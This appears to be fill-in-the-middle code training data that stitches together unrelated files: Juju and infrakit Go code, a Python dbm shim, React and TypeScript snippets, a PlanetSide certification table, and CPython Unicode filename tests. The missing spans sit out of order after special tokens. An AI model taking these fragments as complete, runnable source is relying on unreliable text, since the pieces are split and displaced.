"gopkg.in/juju/names.v2"
"github.com/juju/juju/agent"
"github.com/juju/juju/agent/tools"
svctesting "github.com/juju/juju/service/common/testing"
"github.com/juju/juju/service/upstart"
"github.com/juju/juju/state/multiwatcher"
"github.com/juju/juju/testing"
coretools "github.com/juju/juju/tools"
jujuversion "github.com/juju/juju/version"
"github.com/juju/juju/worker/deployer"
)
var quote, cmdSuffix string
func init() {
quote = "'"
if runtime.GOOS == "windows" {
cmdSuffix = ".exe"
quote = `"`
}
}
type SimpleContextSuite struct {
SimpleToolsFixture
}
var _ = gc.Suite(&SimpleContextSuite{})
func (s *SimpleContextSuite) SetUpTest(c *gc.C) {
s.SimpleToolsFixture.SetUp(c, c.MkDir())
}
func (s *SimpleContextSuite) TearDownTest(c *gc.C) {
s.SimpleToolsFixture.TearDown(c)
}
func (s *SimpleContextSuite) TestDeployRecall(c *gc.C) {
mgr0 := s.getContext(c)
units, err := mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
err = mgr0.DeployUnit("foo/123", "some-password")
c.Assert(err, jc.ErrorIsNil)
units, err = mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.DeepEquals, []string{"foo/123"})
s.assertUpstartCount(c, 1)
s.checkUnitInstalled(c, "foo/123", "some-password")
err = mgr0.RecallUnit("foo/123")
c.Assert(err, jc.ErrorIsNil)
units, err = mgr0.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
s.checkUnitRemoved(c, "foo/123")
}
func (s *SimpleContextSuite) TestOldDeployedUnitsCanBeRecalled(c *gc.C) {
// After r1347 deployer tag is no longer part of the upstart conf filenames,
// now only the units' tags are used. This change is with the assumption only
// one deployer will be running on a machine (in the machine agent as a task,
// unlike before where there was one in the unit agent as well).
// This test ensures units deployed previously (or their upstart confs more
// specifically) can be detected and recalled by the deployer.
manager := s.getContext(c)
// No deployed units at first.
units, err := manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
s.assertUpstartCount(c, 0)
// Trying to recall any units will fail.
err = manager.RecallUnit("principal/1")
c.Assert(err, gc.ErrorMatches, `unit "principal/1" is not deployed`)
// Simulate some previously deployed units with the old
// upstart conf filename format (+deployer tags).
s.injectUnit(c, "jujud-machine-0:unit-mysql-0", "unit-mysql-0")
s.assertUpstartCount(c, 1)
s.injectUnit(c, "jujud-unit-wordpress-0:unit-nrpe-0", "unit-nrpe-0")
s.assertUpstartCount(c, 2)
// Make sure we can discover them.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 2)
sort.Strings(units)
c.Assert(units, gc.DeepEquals, []string{"mysql/0", "nrpe/0"})
// Deploy some units.
err = manager.DeployUnit("principal/1", "some-password")
c.Assert(err, jc.ErrorIsNil)
s.checkUnitInstalled(c, "principal/1", "some-password")
s.assertUpstartCount(c, 3)
err = manager.DeployUnit("subordinate/2", "fake-password")
c.Assert(err, jc.ErrorIsNil)
s.checkUnitInstalled(c, "subordinate/2", "fake-password")
s.assertUpstartCount(c, 4)
// Verify the newly deployed units are also discoverable.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 4)
sort.Strings(units)
c.Assert(units, gc.DeepEquals, []string{"mysql/0", "nrpe/0", "principal/1", "subordinate/2"})
// Recall all of them - should work ok.
unitCount := 4
for _, unitName := range units {
err = manager.RecallUnit(unitName)
c.Assert(err, jc.ErrorIsNil)
unitCount--
s.checkUnitRemoved(c, unitName)
s.assertUpstartCount(c, unitCount)
}
// Verify they're no longer discoverable.
units, err = manager.DeployedUnits()
c.Assert(err, jc.ErrorIsNil)
c.Assert(units, gc.HasLen, 0)
}
type SimpleToolsFixture struct {
dataDir string
logDir string
origPath string
binDir string
data *svctesting.FakeServiceData
}
var fakeJujud = "#!/bin/bash --norc\n# fake-jujud\nexit 0\n"
func (fix *SimpleToolsFixture) SetUp(c *gc.C, dataDir string) {
fix.dataDir = dataDir
fix.logDir = c.MkDir()
current := version.Binary{
Number: jujuversion.Current,
Arch: arch.HostArch(),
Series: series.HostSeries(),
}
toolsDir := tools.SharedToolsDir(fix.dataDir, current)
err := os.MkdirAll(toolsDir, 0755)
c.Assert(err, jc.ErrorIsNil)
jujudPath := filepath.Join(toolsDir, "jujud")
err = ioutil.WriteFile(jujudPath, []byte(fakeJujud), 0755)
c.Assert(err, jc.ErrorIsNil)
toolsPath := filepath.Join(toolsDir, "downloaded-tools.txt")
testTools := coretools.Tools{Version: current, URL: "http://testing.invalid/tools"}
data, err := json.Marshal(testTools)
c.Assert(err, jc.ErrorIsNil)
err = ioutil.WriteFile(toolsPath, data, 0644)
c.Assert(err, jc.ErrorIsNil)
fix.binDir = c.MkDir()
fix.origPath = os.Getenv("PATH")
os.Setenv("PATH", fix.binDir+":"+fix.origPath)
fix.makeBin(c, "status", `echo "blah stop/waiting"`)
fix.makeBin(c, "stopped-status", `echo "blah stop/waiting"`)
fix.makeBin(c, "started-status", `echo "blah start/running, process 666"`)
fix.makeBin(c, "start", "cp $(which started-status) $(which status)")
fix.makeBin(c, "stop", "cp $(which stopped-status) $(which status)")
fix.data = svctesting.NewFakeServiceData()
}
func (fix *SimpleToolsFixture) TearDown(c *gc.C) {
os.Setenv("PATH", fix.origPath)
}
func (fix *SimpleToolsFixture) makeBin(c *gc.C, name, script string) {
path := filepath.Join(fix.binDir, name)
err := ioutil.WriteFile(path, []byte("#!/bin/bash --norc\n"+script), 0755)
c.Assert(err, jc.ErrorIsNil)
}
func (fix *SimpleToolsFixture) assertUpstartCount(c *gc.C, count int) {
c.Assert(fix.data.InstalledNames(), gc.HasLen, count)
}
func (fix *SimpleToolsFixture) getContext(c *gc.C) *deployer.SimpleContext {
config := agentConfig(names.NewMachineTag("99"), fix.dataDir, fix.logDir)
return deployer.NewTestSimpleContext(config, fix.logDir, fix.data)
}
func (fix *SimpleToolsFixture) getContextForMachine(c *gc.C, machineTag names.Tag) *deployer.SimpleContext {
config := agentConfig(machineTag, fix.dataDir, fix.logDir)
return deployer.NewTestSimpleContext(config, fix.logDir, fix.data)
}
func (fix *SimpleToolsFixture) paths(tag names.Tag) (agentDir, toolsDir string) {
agentDir = agent.Dir(fix.dataDir, tag)
toolsDir = tools.ToolsDir(fix.dataDir, tag.String())
return
}
func (fix *SimpleToolsFixture) checkUnitInstalled(c *gc.C, name, password string) {
tag := names.NewUnitTag(name)
svcName := "jujud-" + tag.String()
assertContains(c, fix.data.InstalledNames(), svcName)
svcConf := fix.data.GetInstalled(svcName).Conf()
// TODO(ericsnow) For now we just use upstart serialization.
uconfData, err := upstart.Serialize(svcName, svcConf)
c.Assert(err, jc.ErrorIsNil)
uconf := string(uconfData)
regex := regexp.MustCompile("(?m)(?:^\\s)*exec\\s.+$")
execs := regex.FindAllString(uconf, -1)
if nil == execs {
c.Fatalf("no command found in conf:\n%s", uconf)
} else if 1 > len(execs) {
c.Fatalf("Test is not built to handle more than one exec line.")
}
_, toolsDir := fix.paths(tag)
jujudPath := filepath.Join(toolsDir, "jujud"+cmdSuffix)
logPath := filepath.Join(fix.logDir, tag.String()+".log")
for _, pat := range []string{
"^exec " + quote + jujudPath + quote + " unit ",
" --unit-name " + name + " ",
" >> " + logPath + " 2>&1$",
} {
match, err := regexp.MatchString(pat, execs[0])
c.Assert(err, jc.ErrorIsNil)
if !match {
c.Fatalf("failed to match:\n%s\nin:\n%s", pat, execs[0])
}
}
conf, err := agent.ReadConfig(agent.ConfigPath(fix.dataDir, tag))
c.Assert(err, jc.ErrorIsNil)
c.Assert(conf.Tag(), gc.Equals, tag)
c.Assert(conf.DataDir(), gc.Equals, fix.dataDir)
jujudData, err := ioutil.ReadFile(jujudPath)
c.Assert(err, jc.ErrorIsNil)
c.Assert(string(jujudData), gc.Equals, fakeJujud)
}
func (fix *SimpleToolsFixture) checkUnitRemoved(c *gc.C, name string) {
assertNotContains(c, fix.data.InstalledNames(), name)
tag := names.NewUnitTag(name)
agentDir, toolsDir := fix.paths(tag)
for _, path := range []string{agentDir, toolsDir} {
_, err := ioutil.ReadFile(path)
if err == nil {
c.Logf("Warning: %q not removed as expected", path)
} else {
c.Assert(err, jc.Satisfies, os.IsNotExist)
}
}
}
func (fix *SimpleToolsFixture) injectUnit(c *gc.C, name, unitTag string) {
fix.data.SetStatus(name, "installed")
toolsDir := filepath.Join(fix.dataDir, "tools", unitTag)
err := os.MkdirAll(toolsDir, 0755)
c.Assert(err, jc.ErrorIsNil)
}
type mockConfig struct {
agent.Config
tag names.Tag
datadir string
logdir string
upgradedToVersion version.Number
jobs []multiwatcher.MachineJob
}
func (mock *mockConfig) Tag() names.Tag {
return mock.tag
}
func (mock *mockConfig) DataDir() string {
return mock.datadir
}
func (mock *mockConfig) LogDir() string {
return mock.logdir
}
func (mock *mockConfig) Jobs() []multiwatcher.MachineJob {
return mock.jobs
}
func (mock *mockConfig) UpgradedToVersion() version.Number {
return mock.upgradedToVersion
}
func (mock *mockConfig) WriteUpgradedToVersion(newVersion version.Number) error {
mock.upgradedToVersion = newVersion
return nil
}
func (mock *mockConfig) Model() names.ModelTag {
return testing.ModelTag
}
func (mock *mockConfig) Controller() names.ControllerTag {
return testing.ControllerTag
}
func (mock *mockConfig) CACert() string {
return testing.CACert
}
func (mock *mockConfig) Value(_ string) string {
return ""
}
func agentConfig(tag names.Tag, datadir, logdir string) agent.Config {
return &mockConfig{tag: tag, datadir: datadir, logdir: logdir}
}
// assertContains asserts a needle is contained within haystack
func assertContains(c *gc.C, haystack []string, needle string) {
c.Assert(contains(haystack, needle), jc.IsTrue)
}
// assertNotContains asserts a needle is not contained within haystack
func assertNotContains(c *gc.C, haystack []string, needle string) {
c.Assert(contains(haystack, needle), gc.Not(jc.IsTrue))
}
func contains(haystack []string, needle string) bool {
for _, e := range haystack {
if e == needle {
return true
}
}
return false
}<|fim▁end|>
|
"os"
"path/filepath"
"regexp"
"runtime"
|
<|file_name|>depends.go<|end_file_name|><|fim▁begin|>package depends
import (
"fmt"
"sync"
logutil "github.com/docker/infrakit/pkg/log"
"github.com/docker/infrakit/pkg/types"
)
var log = logutil.New("module", "run/depends")
// ParseDependsFunc returns a list of dependencies of this spec.
type ParseDependsFunc func(types.Spec) (Runnables, error)
var (
parsers = map[string]map[types.InterfaceSpec]ParseDependsFunc{}
lock = sync.RWMutex{}
)
// Register registers a helper for parsing for dependencies based on a key (e.g. 'group')
// and interface spec (Group/1.0)
func Register(key string, interfaceSpec types.InterfaceSpec, f ParseDependsFunc) {
lock.Lock()
defer lock.Unlock()
if _, has := parsers[key]; !has {
parsers[key] = map[types.InterfaceSpec]ParseDependsFunc{}
}
if _, has := parsers[key][interfaceSpec]; has {
panic(fmt.Errorf("duplicate depdency parser for %v / %v", key, interfaceSpec))
}
parsers[key][interfaceSpec] = f
}
// Resolve returns the dependencies listed in the spec as well as inside the properties.
// InterfaceSpec is optional. If nil, the first match by key (kind) is used. If nothing is registered, returns nil
// and no error. Error is returned for exceptions (eg. parsing, etc.)
func Resolve(spec types.Spec, key string, interfaceSpec *types.InterfaceSpec) (Runnables, error) {
lock.RLock()
defer lock.RUnlock()
m, has := parsers[key]
if !has {
return nil, nil
}
if interfaceSpec == nil {<|fim▁hole|> // First match
return parse(spec)
}
}
parse, has := m[*interfaceSpec]
if !has {
return nil, nil
}
return parse(spec)
}<|fim▁end|>
|
for _, parse := range m {
|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|><|fim▁hole|>from ..version_info import PY2
if PY2:
from . import dumb, gnu, ndbm
from whichdb import *
from anydbm import *<|fim▁end|>
|
from __future__ import absolute_import
from dbm import *
|
<|file_name|>Main.js<|end_file_name|><|fim▁begin|>import React from 'react';
import PropTypes from 'prop-types';
import Button from 'components/Button';
Main.propTypes = {
showLoginForm: PropTypes.func.isRequired,
showSignUpForm: PropTypes.func.isRequired
};
export default function Main({ showLoginForm, showSignUpForm }) {
return (
<main><|fim▁hole|> onClick={showLoginForm}
>
Yes, I have an account
</Button>
<Button
color="pink"
style={{ marginTop: '1.5rem', fontSize: '2rem', padding: '1rem' }}
onClick={showSignUpForm}
>
{"No, I'm a new user. Make me a new account, please!"}
</Button>
</main>
);
}<|fim▁end|>
|
<Button
color="logoBlue"
style={{ display: 'block', fontSize: '2.5rem', padding: '1rem' }}
|
<|file_name|>qualifications.js<|end_file_name|><|fim▁begin|>/* exported Qualifications */
function Qualifications(skills, items) {
var requirements = {
'soldier': {
meta: {
passPercentage: 100
},
classes: {
'Heavy Assault': {
certifications: [
{ skill: skills.heavyAssault.flakArmor, level: 3 }
],
equipment: []
},
'Light Assault': {
certifications: [
{ skill: skills.lightAssault.flakArmor, level: 3 }
],
equipment: []
},
'Engineer': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 3 },
{ skill: skills.engineer.nanoArmorKit, level: 4 },
{ skill: skills.engineer.tankMine, level: 1 }
],
equipment: []
},
'Medic': {
certifications: [
{ skill: skills.medic.flakArmor, level: 3 },
{ skill: skills.medic.medicalApplicator, level: 4 }
],
equipment: []
},
'Infiltrator': {
certifications: [
{ skill: skills.infiltrator.flakArmor, level: 3 }
],
equipment: []
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.advancedMobileStation, level: 1 }
],
equipment: []
},
'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.priorityDeployment, level: 0 }
],
equipment: []
}
}
},
'veteran': {
meta: {
passPercentage: 100
},
classes: {
'Heavy Assault': {
certifications: [
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.antiVehicleGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 1 }
],
equipment: []
},
'Light Assault': {
certifications: [
{ skill: skills.lightAssault.c4, level: 2 },
{ skill: skills.lightAssault.drifterJumpJets, level: 2 }
],
equipment: []
},
'Engineer': {
certifications: [
{ skill: skills.engineer.nanoArmorKit, level: 6 },
{ skill: skills.engineer.claymoreMine, level: 2 },
{ skill: skills.engineer.tankMine, level: 2 },
{ skill: skills.engineer.ammunitionPackage, level: 3 },
{ skill: skills.engineer.stickyGrenade, level: 1 }
],
equipment: [
items.weapon.trac5s,
items.engineer.avManaTurret
]
},
'Medic': {
certifications: [
{ skill: skills.medic.medicalApplicator, level: 6 },
{ skill: skills.medic.nanoRegenDevice, level: 6 }
],
equipment: []
},
'Infiltrator': {
certifications: [
{ skill: skills.infiltrator.advancedEquipmentTerminalHacking, level: 3 }
],
equipment: []
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.vehicleAmmoDispenser, level: 1 },
{ skill: skills.sunderer.blockadeArmor, level: 3 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 2 }
],<|fim▁hole|> 'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.priorityDeployment, level: 2 }
],
equipment: []
}
}
},
'medic': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Offensive Medic': {
certifications: [
{ skill: skills.medic.grenadeBandolier, level: 2 },
{ skill: skills.medic.naniteReviveGrenade, level: 1 },
{ skill: skills.medic.nanoRegenDevice, level: 6 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: []
},
'Loadout: Defensive Medic': {
certifications: [
{ skill: skills.medic.flakArmor, level: 4 },
{ skill: skills.medic.naniteReviveGrenade, level: 1 },
{ skill: skills.medic.regenerationField, level: 5 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: []
}
}
},
'engineer': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry MANA Turret': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 4 },
{ skill: skills.engineer.claymoreMine, level: 2 }
],
equipment: [
items.weapon.trac5s
]
},
'Loadout: Anti-Vehicle MANA Turret': {
certifications: [
{ skill: skills.engineer.flakArmor, level: 4 },
{ skill: skills.engineer.tankMine, level: 2 },
{ skill: skills.engineer.avManaTurret, level: 1 }
],
equipment: [
items.weapon.trac5s,
items.engineer.avManaTurret
]
}
}
},
'lightAssault': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Bounty Hunter': {
certifications: [
{ skill: skills.lightAssault.flakArmor, level: 4 },
{ skill: skills.lightAssault.jumpJets, level: 6 },
{ skill: skills.lightAssault.flashGrenade, level: 1 }
],
equipment: []
},
'Loadout: Death From Above': {
certifications: [
{ skill: skills.lightAssault.grenadeBandolier, level: 2 },
{ skill: skills.lightAssault.drifterJumpJets, level: 5 },
{ skill: skills.lightAssault.smokeGrenade, level: 1 }
],
equipment: []
}
}
},
'infiltrator': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Close Quarters': {
certifications: [
{ skill: skills.infiltrator.flakArmor, level: 4 },
{ skill: skills.infiltrator.grenadeBandolier, level: 2 },
{ skill: skills.infiltrator.reconDetectDevice, level: 6 },
{ skill: skills.infiltrator.claymoreMine, level: 2 },
{ skill: skills.infiltrator.empGrenade, level: 1 }
],
equipment: [
items.weapon.ns7pdw
]
},
'Loadout: Assassin': {
certifications: [
{ skill: skills.infiltrator.ammunitionBelt, level: 3 },
{ skill: skills.infiltrator.motionSpotter, level: 5 },
{ skill: skills.infiltrator.claymoreMine, level: 2 },
{ skill: skills.infiltrator.decoyGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: [
items.weapon.rams
]
}
}
},
'heavyAssault': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry': {
certifications: [
{ skill: skills.heavyAssault.grenadeBandolier, level: 2 },
{ skill: skills.heavyAssault.flakArmor, level: 4 },
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.concussionGrenade, level: 1 },
{ skill: skills.universal.medicalKit, level: 3 }
],
equipment: [
items.weapon.decimator
]
},
'Loadout: Anti-Armor': {
certifications: [
{ skill: skills.heavyAssault.flakArmor, level: 4 },
{ skill: skills.heavyAssault.resistShield, level: 1 },
{ skill: skills.heavyAssault.c4, level: 1 },
{ skill: skills.heavyAssault.antiVehicleGrenade, level: 1 }
],
equipment: [
items.weapon.skep,
items.weapon.grounder
]
}
}
},
'maxUnit': {
meta: {
passPercentage: 100
},
classes: {
'Loadout: Anti-Infantry': {
certifications: [
{ skill: skills.max.kineticArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftMercy,
items.max.rightMercy
]
},
'Loadout: Anti-Armor': {
certifications: [
{ skill: skills.max.flakArmor, level: 5 },
{ skill: skills.max.kineticArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftPounder,
items.max.rightPounder
]
},
'Loadout: Anti-Air': {
certifications: [
{ skill: skills.max.flakArmor, level: 5 },
{ skill: skills.max.lockdown, level: 2 }
],
equipment: [
items.max.leftBurster,
items.max.rightBurster
]
}
}
},
'basicTanks': {
meta: {
passPercentage: 100
},
classes: {
'Prowler': {
certifications: [
{ skill: skills.prowler.anchoredMode, level: 1 }
],
equipment: [
items.prowler.walker
]
},
'Sunderer': {
certifications: [
{ skill: skills.sunderer.vehicleAmmoDispenser, level: 1 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 2 }
],
equipment: []
}
}
},
'sunderer': {
meta: {
passPercentage: 100
},
classes: {
'Sunderer': {
certifications: [
{ skill: skills.sunderer.mineGuard, level: 4 },
{ skill: skills.sunderer.blockadeArmor, level: 4 },
{ skill: skills.sunderer.gateShieldDiffuser, level: 3 },
{ skill: skills.sunderer.naniteProximityRepairSystem, level: 6 }
],
equipment: []
}
}
},
'prowler': {
meta: {
passPercentage: 100
},
classes: {
'Prowler': {
certifications: [
{ skill: skills.prowler.anchoredMode, level: 4 },
{ skill: skills.prowler.mineGuard, level: 4 }
],
equipment: [
items.prowler.p2120ap,
items.prowler.halberd
]
}
}
},
'lightning': {
meta: {
passPercentage: 100
},
classes: {
'Lightning': {
certifications: [
{ skill: skills.lightning.reinforcedTopArmor, level: 1 }
],
equipment: [
items.lightning.skyguard
]
}
}
},
'harasser': {
meta: {
passPercentage: 100
},
classes: {
'Harasser': {
certifications: [
{ skill: skills.harasser.fireSuppressionSystem, level: 4 },
{ skill: skills.harasser.compositeArmor, level: 4 },
{ skill: skills.harasser.turbo, level: 5 }
],
equipment: [
items.harasser.halberd
]
}
}
},
'commander': {
meta: {
passPercentage: 100
},
classes: {
'Squad Leader': {
certifications: [
{ skill: skills.squadLeader.commandCommChannel, level: 1 },
{ skill: skills.squadLeader.requestReinforcements, level: 1 },
{ skill: skills.squadLeader.rallyPointGreen, level: 1 },
{ skill: skills.squadLeader.rallyPointOrange, level: 1 },
{ skill: skills.squadLeader.rallyPointPurple, level: 1 },
{ skill: skills.squadLeader.rallyPointYellow, level: 1 },
{ skill: skills.squadLeader.priorityDeployment, level: 4 }
],
equipment: []
}
}
}
},
echoHavoc = qual('Echo Havoc', null, null, true),
max = qual('MAX', echoHavoc, requirements.maxUnit),
heavyAssault = qual('Heavy Assault', max, requirements.heavyAssault),
echoCovertOps = qual('Echo Covert Ops', null, null, true),
infiltrator = qual('Infiltrator', echoCovertOps, requirements.infiltrator),
lightAssault = qual('Light Assault', infiltrator, requirements.lightAssault),
echoSpecialist = qual('Echo Specialist', null, null, true),
engineer = qual('Engineer', echoSpecialist, requirements.engineer),
combatMedic = qual('Combat Medic', engineer, requirements.medic),
commander = qual('Commander', null, requirements.commander, true),
sunderer = qual('Sunderer', [ echoSpecialist, echoCovertOps, echoHavoc ], requirements.sunderer),
harasser = qual('Harasser', null, requirements.harasser),
lightning = qual('Lightning', harasser, requirements.lightning),
prowler = qual('Prowler', lightning, requirements.prowler),
basicTanks = qual('Basic Tanks', [ sunderer, prowler ], requirements.basicTanks),
veteran = qual('Veteran', [ combatMedic, lightAssault, heavyAssault, commander ], requirements.veteran, true),
soldier = qual('Soldier', [ veteran, basicTanks ], requirements.soldier, true);
addParentRelationships(soldier);
return soldier;
function qual(name, child, certs, isRank) {
var obj = {};
obj.name = name;
if (child) {
if ($.isArray(child)) {
obj.child = child;
} else {
obj.child = [ child ];
}
}
if (certs) {
obj.cert = certs;
}
if (isRank) {
obj.isRank = true;
}
return obj;
}
function addParentRelationships(rank, parent) {
if (parent) {
if (rank.parent) {
rank.parent.push(parent);
} else {
rank.parent = [ parent ];
}
}
if (rank.child) {
$.each(rank.child, function() {
addParentRelationships(this, rank);
});
}
}
}<|fim▁end|>
|
equipment: []
},
|
<|file_name|>audioRecorder.d.ts<|end_file_name|><|fim▁begin|>import JitsiConference from '../../JitsiConference';
import JitsiTrack from '../RTC/JitsiTrack';
export class AudioRecorder {
constructor( jitsiConference: JitsiConference );
determineCorrectFileType: unknown; // TODO:
addTrack: ( track: JitsiTrack ) => void;
instantiateTrackRecorder: ( track: JitsiTrack ) => void;
removeTrack: ( track: JitsiTrack ) => void;
updateNames: () => void;<|fim▁hole|> getFileType: () => string;
}<|fim▁end|>
|
start: () => void;
stop: () => void;
download: () => void;
getRecordingResults: () => Array<unknown>; // TODO:
|
<|file_name|>test_pep277.py<|end_file_name|><|fim▁begin|># Test the Unicode versions of normal file functions
# open, os.open, os.stat. os.listdir, os.rename, os.remove, os.mkdir, os.chdir, os.rmdir
import sys, os, unittest
from unicodedata import normalize
from test import test_support
filenames = [
'1_abc',
u'2_ascii',
u'3_Gr\xfc\xdf-Gott',
u'4_\u0393\u03b5\u03b9\u03ac-\u03c3\u03b1\u03c2',
u'5_\u0417\u0434\u0440\u0430\u0432\u0441\u0442\u0432\u0443\u0439\u0442\u0435',
u'6_\u306b\u307d\u3093',
u'7_\u05d4\u05e9\u05e7\u05e6\u05e5\u05e1',
u'8_\u66e8\u66e9\u66eb',
u'9_\u66e8\u05e9\u3093\u0434\u0393\xdf',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
u'10_\u1fee\u1ffd',
]
# Mac OS X decomposes Unicode names, using Normal Form D.
# http://developer.apple.com/mac/library/qa/qa2001/qa1173.html
# "However, most volume formats do not follow the exact specification for
# these normal forms. For example, HFS Plus uses a variant of Normal Form D
# in which U+2000 through U+2FFF, U+F900 through U+FAFF, and U+2F800 through
# U+2FAFF are not decomposed."
if sys.platform != 'darwin':
filenames.extend([
# Specific code points: NFC(fn), NFD(fn), NFKC(fn) and NFKD(fn) all differents
u'11_\u0385\u03d3\u03d4',
u'12_\u00a8\u0301\u03d2\u0301\u03d2\u0308', # == NFD(u'\u0385\u03d3\u03d4')
u'13_\u0020\u0308\u0301\u038e\u03ab', # == NFKC(u'\u0385\u03d3\u03d4')
u'14_\u1e9b\u1fc1\u1fcd\u1fce\u1fcf\u1fdd\u1fde\u1fdf\u1fed',
# Specific code points: fn, NFC(fn) and NFKC(fn) all differents
u'15_\u1fee\u1ffd\ufad1',
u'16_\u2000\u2000\u2000A',
u'17_\u2001\u2001\u2001A',
u'18_\u2003\u2003\u2003A', # == NFC(u'\u2001\u2001\u2001A')
u'19_\u0020\u0020\u0020A', # u'\u0020' == u' ' == NFKC(u'\u2000') ==
# NFKC(u'\u2001') == NFKC(u'\u2003')
])
# Is it Unicode-friendly?
if not os.path.supports_unicode_filenames:
fsencoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
try:
for name in filenames:
name.encode(fsencoding)
except UnicodeEncodeError:
raise unittest.SkipTest("only NT+ and systems with "
"Unicode-friendly filesystem encoding")
# Destroy directory dirname and all files under it, to one level.
def deltree(dirname):
# Don't hide legitimate errors: if one of these suckers exists, it's
# an error if we can't remove it.
if os.path.exists(dirname):
# must pass unicode to os.listdir() so we get back unicode results.
for fname in os.listdir(unicode(dirname)):
os.unlink(os.path.join(dirname, fname))
os.rmdir(dirname)
class UnicodeFileTests(unittest.TestCase):
files = set(filenames)
normal_form = None
def setUp(self):
try:
os.mkdir(test_support.TESTFN)
except OSError:
pass
files = set()
for name in self.files:
name = os.path.join(test_support.TESTFN, self.norm(name))
with open(name, 'w') as f:
f.write((name+'\n').encode("utf-8"))
os.stat(name)
files.add(name)
self.files = files
def tearDown(self):
deltree(test_support.TESTFN)
def norm(self, s):
if self.normal_form and isinstance(s, unicode):
return normalize(self.normal_form, s)
return s
def _apply_failure(self, fn, filename, expected_exception,
check_fn_in_exception = True):
with self.assertRaises(expected_exception) as c:
fn(filename)
exc_filename = c.exception.filename
# the "filename" exception attribute may be encoded
if isinstance(exc_filename, str):
filename = filename.encode(sys.getfilesystemencoding())
if check_fn_in_exception:
self.assertEqual(exc_filename, filename, "Function '%s(%r) failed "
"with bad filename in the exception: %r" %
(fn.__name__, filename, exc_filename))
def test_failures(self):
# Pass non-existing Unicode filenames all over the place.
for name in self.files:
name = "not_" + name
self._apply_failure(open, name, IOError)
self._apply_failure(os.stat, name, OSError)
self._apply_failure(os.chdir, name, OSError)
self._apply_failure(os.rmdir, name, OSError)
self._apply_failure(os.remove, name, OSError)
# listdir may append a wildcard to the filename, so dont check
self._apply_failure(os.listdir, name, OSError, False)
def test_open(self):
for name in self.files:
f = open(name, 'w')
f.write((name+'\n').encode("utf-8"))
f.close()
os.stat(name)
<|fim▁hole|> # Skip the test on darwin, because darwin does normalize the filename to
# NFD (a variant of Unicode NFD form). Normalize the filename to NFC, NFKC,
# NFKD in Python is useless, because darwin will normalize it later and so
# open(), os.stat(), etc. don't raise any exception.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_normalize(self):
files = set(f for f in self.files if isinstance(f, unicode))
others = set()
for nf in set(['NFC', 'NFD', 'NFKC', 'NFKD']):
others |= set(normalize(nf, file) for file in files)
others -= files
for name in others:
self._apply_failure(open, name, IOError)
self._apply_failure(os.stat, name, OSError)
self._apply_failure(os.chdir, name, OSError)
self._apply_failure(os.rmdir, name, OSError)
self._apply_failure(os.remove, name, OSError)
# listdir may append a wildcard to the filename, so dont check
self._apply_failure(os.listdir, name, OSError, False)
# Skip the test on darwin, because darwin uses a normalization different
# than Python NFD normalization: filenames are different even if we use
# Python NFD normalization.
@unittest.skipIf(sys.platform == 'darwin', 'irrelevant test on Mac OS X')
def test_listdir(self):
sf0 = set(self.files)
f1 = os.listdir(test_support.TESTFN)
f2 = os.listdir(unicode(test_support.TESTFN,
sys.getfilesystemencoding()))
sf2 = set(os.path.join(unicode(test_support.TESTFN), f) for f in f2)
self.assertEqual(sf0, sf2)
self.assertEqual(len(f1), len(f2))
def test_rename(self):
for name in self.files:
os.rename(name, "tmp")
os.rename("tmp", name)
def test_directory(self):
dirname = os.path.join(test_support.TESTFN,
u'Gr\xfc\xdf-\u66e8\u66e9\u66eb')
filename = u'\xdf-\u66e8\u66e9\u66eb'
oldwd = os.getcwd()
os.mkdir(dirname)
os.chdir(dirname)
try:
with open(filename, 'w') as f:
f.write((filename + '\n').encode("utf-8"))
os.access(filename,os.R_OK)
os.remove(filename)
finally:
os.chdir(oldwd)
os.rmdir(dirname)
class UnicodeNFCFileTests(UnicodeFileTests):
normal_form = 'NFC'
class UnicodeNFDFileTests(UnicodeFileTests):
normal_form = 'NFD'
class UnicodeNFKCFileTests(UnicodeFileTests):
normal_form = 'NFKC'
class UnicodeNFKDFileTests(UnicodeFileTests):
normal_form = 'NFKD'
def test_main():
try:
test_support.run_unittest(
UnicodeFileTests,
UnicodeNFCFileTests,
UnicodeNFDFileTests,
UnicodeNFKCFileTests,
UnicodeNFKDFileTests,
)
finally:
deltree(test_support.TESTFN)
if __name__ == "__main__":
test_main()<|fim▁end|>
| |
<|file_name|>user-uuid-store.js<|end_file_name|><|fim▁begin|>/*!
* Copyright (c) 2015-2017 Cisco Systems, Inc. See LICENSE file.
*/
